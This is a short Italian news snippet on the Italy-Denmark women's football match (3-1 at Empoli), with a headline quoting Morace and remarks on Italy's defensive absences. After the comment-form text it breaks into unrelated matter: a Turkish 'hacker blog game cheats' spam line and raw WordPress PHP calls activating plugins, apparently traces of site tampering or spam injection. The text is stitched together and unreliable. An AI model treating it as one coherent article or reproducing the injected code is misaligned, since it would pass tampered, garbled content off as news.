Italia-Danimarca, Morace: “Al ritorno serve più coraggio”


Le danesi hanno mostrato più esperienza e all’Italia hanno pesato le assenze in difesa. Si deve ripartire da Giacinti e dalla reazione dopo il 2-0

Il 3-1 di Empoli ha fissato il divario tecnico, tattico e fisico tra noi e la Danimarca. La squadra di Bertolini esce comunque dal campo conscia di aver lottato e cercato di rientrare in partita fin da subito e, soprattutto, fino alla fine. Hanno pesato le assenze in difesa, soprattutto sotto il piano della personalità, di Sara Gama e di Alia Guagni.

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );